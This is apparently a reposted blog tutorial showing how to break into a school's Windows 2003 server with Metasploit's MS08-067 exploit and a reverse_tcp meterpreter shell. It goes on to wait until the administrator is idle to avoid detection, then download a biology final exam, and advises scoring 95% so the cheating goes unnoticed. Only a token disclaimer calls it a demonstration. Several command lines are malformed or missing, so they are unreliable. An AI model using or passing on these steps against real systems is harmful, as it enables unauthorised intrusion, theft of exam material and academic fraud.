This hack uses Metasploit along with its meterpreter, so let's get after those finals and fire up our Metasploit in BackTrack!
WARNING (Disclaimer):
Of
course, this is for demonstration/entertainment purposes only. Please
do not break into your school's server and steal exams as it's illegal
and very likely will get you kicked out of school. This is just an
example of the security risks that high schools and colleges pose from
using outdated systems with known vulnerabilities.
Step 1Find That Proper Exploit
Those of you with experience with Metasploit, or have followed my previous Metasploit tutorials, know that one of my favorite exploits is the RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.
In
our case here, our school is running a Windows 2003 Server that stores
all the department's exams and records. So, let's use the /exploit/windows/smb/ms08_067_netapi. To find it, type:
msf > search ms08
Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:
msf > use /exploit/windows/smb/ms08_067_netapi
Step 2Set the Payload
Now we need to set our payload. In this case, we'll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp.
msf > set payload /windows/meterpreter/reverse_tcp
Let's take a look next at the options that we need for this exploit/payload combination by typing:
msf > show options
Step 3Set the Options
Now we can see that we need to set the RHOST and the LHOST.
msf >set LHOST 192.168.1.114
msf >set RHOST192.168.1.108
Step 4Exploit That Server!
Now all we to need do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.
msf > exploit
Step 5Check to See if the Admin Is Using the System
We
should now have a meterpreter shell on the school's server. Before we
can even consider to download files from that server, we want to make
certain that no one is on that system where we might get detected. We
can run the idletime command to see whether anyone has used the system recently.
meterpreter >idletime
As
you can see, the last time someone did something on the system was just
over 3 minutes ago. To be safe, let's wait a bit and hope the
administrator goes home for night. The last thing we want is for the
administrator to detect our attempt to download those final exams!
Once
we're safe and the system has been idle for awhile, our next step is to
find those exams. Meterpreter uses standard Linux commands like ls, cd, pwd, and others, so let's type lpwd (both pwd and lpwd will work).
Meterpreter responds with the / symbol indicating that we're in the root directory.
Step 6Find the Final Exams
We can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity. That's probably where the exams are! Let's change directories to Concord University:
meterpreter c:\\ConcordUniversity
Note that we need to use a double \\ to navigate to this directory. This is necessary and critical.
Now we're in ConcordUniversity, we can get a directory listing by typing:
meterprter > ls
We
can see we have folders for Anthropology, Biology, Chemistry, and
Economics. Since we're looking for the Biology final, let's navigate to
the Biology directory.
meterpreter > cd biology
VoilĂ ! There's the final exam for our biology class.
Step 7Download the Final
Meterpreter has a built-in download feature, so all we need to do is type:
We can see that Metasploit has downloaded the FinalExam to our computer! Please note again that we do need to use the double backslash (\\) in denoting the directory of the file we want to download.
When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!
Now
we are guaranteed a 95% (don't get a 100%, the instructor will be
suspicious). If you have any questions, feel free to ask in the
comments, or head on over to the Null Byte forum if you have questions on hacking topics unrelated to this article.
No comments:
Post a Comment